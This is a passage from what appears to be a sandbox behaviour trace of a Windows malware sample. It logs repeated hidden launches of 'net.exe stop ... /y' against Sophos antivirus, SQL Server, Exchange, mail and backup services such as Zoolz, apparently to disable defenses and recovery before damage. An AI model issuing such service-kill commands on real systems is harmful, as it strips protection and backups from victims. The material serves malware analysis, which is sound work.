wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x47c, hStdError=0x0), lpProcessInformation=0x23fb254 | out: lpCommandLine="\"net.exe\" stop MsDtsServer110 /y", lpProcessInformation=0x23fb254*(hProcess=0x3b4, hThread=0x448, dwProcessId=0x1014, dwThreadId=0x1018)) returned 1 [0106.363] CloseHandle (hObject=0x47c) returned 1 [0106.363] GetFileType (hFile=0x4a0) returned 0x3 [0106.363] CloseHandle (hObject=0x448) returned 1 [0107.732] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0107.733] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x4e0, hWritePipe=0x5d8f304*=0x4f8) returned 1 [0107.733] GetCurrentProcess () returned 0xffffffff [0107.733] GetCurrentProcess () returned 0xffffffff [0107.733] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x4f4) returned 1 [0107.734] CloseHandle (hObject=0x4e0) returned 1 [0107.734] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0107.734] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0107.734] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0107.734] CoTaskMemFree (pv=0x741d20) [0107.734] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop POP3Svc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4f8, hStdError=0x0), lpProcessInformation=0x22b4734 | out: lpCommandLine="\"net.exe\" stop POP3Svc /y", lpProcessInformation=0x22b4734*(hProcess=0x3cc, hThread=0x408, dwProcessId=0x10fc, dwThreadId=0x1100)) returned 1 [0108.590] CloseHandle (hObject=0x4f8) returned 1 [0108.756] GetFileType (hFile=0x4f4) returned 0x3 [0108.757] CloseHandle (hObject=0x408) returned 1 [0111.556] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0111.556] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x4f8, hWritePipe=0x5d8f304*=0x3e0) returned 1 [0111.556] GetCurrentProcess () returned 0xffffffff [0111.556] GetCurrentProcess () returned 0xffffffff [0111.557] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x3b8) returned 1 [0111.557] CloseHandle (hObject=0x4f8) returned 1 [0111.557] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0111.557] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0111.557] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0111.557] CoTaskMemFree (pv=0x741d20) [0111.557] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSExchangeMGMT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x24bb424 | out: lpCommandLine="\"net.exe\" stop MSExchangeMGMT /y", lpProcessInformation=0x24bb424*(hProcess=0x4d4, hThread=0x4f8, dwProcessId=0x119c, dwThreadId=0x11a0)) returned 1 [0111.653] CloseHandle (hObject=0x3e0) returned 1 [0111.653] GetFileType (hFile=0x3b8) returned 0x3 [0111.653] CloseHandle (hObject=0x4f8) returned 1 [0112.580] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0112.580] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x4f8, hWritePipe=0x5d8f304*=0x3e0) returned 1 [0112.580] GetCurrentProcess () returned 0xffffffff [0112.580] GetCurrentProcess () returned 0xffffffff [0112.580] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x478) returned 1 [0112.580] CloseHandle (hObject=0x4f8) returned 1 [0112.580] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0112.580] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0112.580] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0112.580] CoTaskMemFree (pv=0x741d20) [0112.581] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “Sophos Clean Service” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f240*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x24d03c0 | out: lpCommandLine="\"net.exe\" stop “Sophos Clean Service” /y", lpProcessInformation=0x24d03c0*(hProcess=0x474, hThread=0x4f8, dwProcessId=0x12a8, dwThreadId=0x12ac)) returned 1 [0112.589] CloseHandle (hObject=0x3e0) returned 1 [0112.589] GetFileType (hFile=0x478) returned 0x3 [0112.589] CloseHandle (hObject=0x4f8) returned 1 [0114.722] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0114.723] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x4a4, hWritePipe=0x5d8f304*=0x3e0) returned 1 [0114.723] GetCurrentProcess () returned 0xffffffff [0114.723] GetCurrentProcess () returned 0xffffffff [0114.723] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x3f0) returned 1 [0114.723] CloseHandle (hObject=0x4a4) returned 1 [0114.723] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0114.723] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0114.723] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0114.723] CoTaskMemFree (pv=0x741d20) [0114.724] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SMTPSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x2272074 | out: lpCommandLine="\"net.exe\" stop SMTPSvc /y", lpProcessInformation=0x2272074*(hProcess=0x4f4, hThread=0x4a4, dwProcessId=0x13dc, dwThreadId=0x13e0)) returned 1 [0115.033] CloseHandle (hObject=0x3e0) returned 1 [0115.033] GetFileType (hFile=0x3f0) returned 0x3 [0115.034] CloseHandle (hObject=0x4a4) returned 1 [0115.933] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0115.933] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x4a4, hWritePipe=0x5d8f304*=0x3e0) returned 1 [0115.933] GetCurrentProcess () returned 0xffffffff [0115.933] GetCurrentProcess () returned 0xffffffff [0115.933] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x504) returned 1 [0115.933] CloseHandle (hObject=0x4a4) returned 1 [0115.933] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0115.933] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0115.933] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0115.933] CoTaskMemFree (pv=0x741d20) [0115.934] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop ReportServer$SQL_2008 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f240*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x2670f88 | out: lpCommandLine="\"net.exe\" stop ReportServer$SQL_2008 /y", lpProcessInformation=0x2670f88*(hProcess=0x4c8, hThread=0x4a4, dwProcessId=0xc9c, dwThreadId=0xe40)) returned 1 [0116.297] CloseHandle (hObject=0x3e0) returned 1 [0116.297] GetFileType (hFile=0x504) returned 0x3 [0116.297] CloseHandle (hObject=0x4a4) returned 1 [0117.751] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.751] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x3e0, hWritePipe=0x5d8f304*=0x478) returned 1 [0117.751] GetCurrentProcess () returned 0xffffffff [0117.751] GetCurrentProcess () returned 0xffffffff [0117.751] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x3c4) returned 1 [0117.751] CloseHandle (hObject=0x3e0) returned 1 [0117.751] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.752] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0117.752] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0117.752] CoTaskMemFree (pv=0x741d20) [0117.752] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “SQLsafe Filter Service” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f23c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x227234c | out: lpCommandLine="\"net.exe\" stop “SQLsafe Filter Service” /y", lpProcessInformation=0x227234c*(hProcess=0x4a4, hThread=0x3e0, dwProcessId=0xca4, dwThreadId=0xd44)) returned 1 [0117.760] CloseHandle (hObject=0x478) returned 1 [0117.760] GetFileType (hFile=0x3c4) returned 0x3 [0117.760] CloseHandle (hObject=0x3e0) returned 1 [0119.956] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0119.956] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x518, hWritePipe=0x5d8f304*=0x478) returned 1 [0119.956] GetCurrentProcess () returned 0xffffffff [0119.956] GetCurrentProcess () returned 0xffffffff [0119.956] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x53c) returned 1 [0119.956] CloseHandle (hObject=0x518) returned 1 [0119.956] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0119.956] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0119.956] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0119.956] CoTaskMemFree (pv=0x741d20) [0119.956] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “Sophos Health Service” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f23c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x2669b18 | out: lpCommandLine="\"net.exe\" stop “Sophos Health Service” /y", lpProcessInformation=0x2669b18*(hProcess=0x540, hThread=0x518, dwProcessId=0x10f8, dwThreadId=0x1068)) returned 1 [0120.689] CloseHandle (hObject=0x478) returned 1 [0120.690] GetFileType (hFile=0x53c) returned 0x3 [0120.690] CloseHandle (hObject=0x518) returned 1 [0122.384] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0122.385] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x478, hWritePipe=0x5d8f304*=0x3cc) returned 1 [0122.385] GetCurrentProcess () returned 0xffffffff [0122.385] GetCurrentProcess () returned 0xffffffff [0122.385] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x46c) returned 1 [0122.385] CloseHandle (hObject=0x478) returned 1 [0122.385] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0122.385] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0122.385] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0122.385] CoTaskMemFree (pv=0x741d20) [0122.385] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop ReportServer$TPSAMA /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f244*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x2271ee4 | out: lpCommandLine="\"net.exe\" stop ReportServer$TPSAMA /y", lpProcessInformation=0x2271ee4*(hProcess=0x4a4, hThread=0x478, dwProcessId=0xe88, dwThreadId=0xec0)) returned 1 [0122.650] CloseHandle (hObject=0x3cc) returned 1 [0122.650] GetFileType (hFile=0x46c) returned 0x3 [0122.650] CloseHandle (hObject=0x478) returned 1 [0124.456] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0124.456] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x478, hWritePipe=0x5d8f304*=0x3cc) returned 1 [0124.456] GetCurrentProcess () returned 0xffffffff [0124.456] GetCurrentProcess () returned 0xffffffff [0124.456] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x540) returned 1 [0124.456] CloseHandle (hObject=0x478) returned 1 [0124.456] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0124.457] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0124.457] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0124.457] CoTaskMemFree (pv=0x741d20) [0124.457] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “Zoolz 2 Service” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f248*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x253bac0 | out: lpCommandLine="\"net.exe\" stop “Zoolz 2 Service” /y", lpProcessInformation=0x253bac0*(hProcess=0x590, hThread=0x478, dwProcessId=0xdd4, dwThreadId=0xc8c)) returned 1 [0124.463] CloseHandle (hObject=0x3cc) returned 1 [0124.463] GetFileType (hFile=0x540) returned 0x3 [0124.464] CloseHandle (hObject=0x478) returned 1 [0125.734] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0125.734] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x478, hWritePipe=0x5d8f304*=0x3cc) returned 1 [0125.734] GetCurrentProcess () returned 0xffffffff [0125.735] GetCurrentProcess () returned 0xffffffff [0125.735] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x538) returned 1 [0125.735] CloseHandle (hObject=0x478) returned 1 [0125.735] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0125.735] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0125.735] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0125.735] CoTaskMemFree (pv=0x741d20) [0125.735] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSOLAP$TPS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f250*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x22bf604 | out: lpCommandLine="\"net.exe\" stop MSOLAP$TPS /y", lpProcessInformation=0x22bf604*(hProcess=0x520, hThread=0x478, dwProcessId=0xf54, dwThreadId=0xf0c)) returned 1 [0127.848] CloseHandle (hObject=0x3cc) returned 1 [0127.853] GetFileType (hFile=0x538) returned 0x3 [0127.854] CloseHandle (hObject=0x478) returned 1 [0130.230] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0130.230] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x3cc, hWritePipe=0x5d8f304*=0x444) returned 1 [0130.230] GetCurrentProcess () returned 0xffffffff [0130.230] GetCurrentProcess () returned 0xffffffff [0130.230] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x4a0) returned 1 [0130.230] CloseHandle (hObject=0x3cc) returned 1 [0130.230] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0130.230] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0130.230] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0130.230] CoTaskMemFree (pv=0x741d20) [0130.230] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “aphidmonitorservice” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f240*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x444, hStdError=0x0), lpProcessInformation=0x227bbe4 | out: lpCommandLine="\"net.exe\" stop “aphidmonitorservice” /y", lpProcessInformation=0x227bbe4*(hProcess=0x46c, hThread=0x3cc, dwProcessId=0xe48, dwThreadId=0xd4c)) returned 1 [0133.740] CloseHandle (hObject=0x444) returned 1 [0133.747] GetFileType (hFile=0x4a0) returned 0x3 [0133.747] CloseHandle (hObject=0x3cc) returned 1 [0134.437] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0134.437] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x444, hWritePipe=0x5d8f304*=0x448) returned 1 [0134.437] GetCurrentProcess () returned 0xffffffff [0134.437] GetCurrentProcess () returned 0xffffffff [0134.437] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x444, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x5a8) returned 1 [0134.437] CloseHandle (hObject=0x444) returned 1 [0134.438] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0134.438] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0134.438] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0134.438] CoTaskMemFree (pv=0x741d20) [0134.438] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop msexchangeadtopology /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5d8f244*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x27922b8 | out: lpCommandLine="\"net.exe\" stop msexchangeadtopology /y", lpProcessInformation=0x27922b8*(hProcess=0x580, hThread=0x444, dwProcessId=0xc80, dwThreadId=0x1118)) returned 1 [0134.442] CloseHandle (hObject=0x448) returned 1 [0134.442] GetFileType (hFile=0x5a8) returned 0x3 [0134.442] CloseHandle (hObject=0x444) returned 1 [0134.442] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0134.442] CreatePipe (in: hReadPipe=0x5d8f308, hWritePipe=0x5d8f304, lpPipeAttributes=0x5d8f288, nSize=0x0 | out: hReadPipe=0x5d8f308*=0x444, hWritePipe=0x5d8f304*=0x448) returned 1 [0134.443] GetCurrentProcess () returned 0xffffffff [0134.443] GetCurrentProcess () returned 0xffffffff [0134.443] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x444, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d8f30c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d8f30c*=0x540) returned 1 [0134.443] CloseHandle (hObject=0x444) returned 1 [0134.443] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0134.443] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0134.443] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0134.443] CoTaskMemFree (pv=0x741d20) [0134.443] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “Sophos MCS Agent” /y", 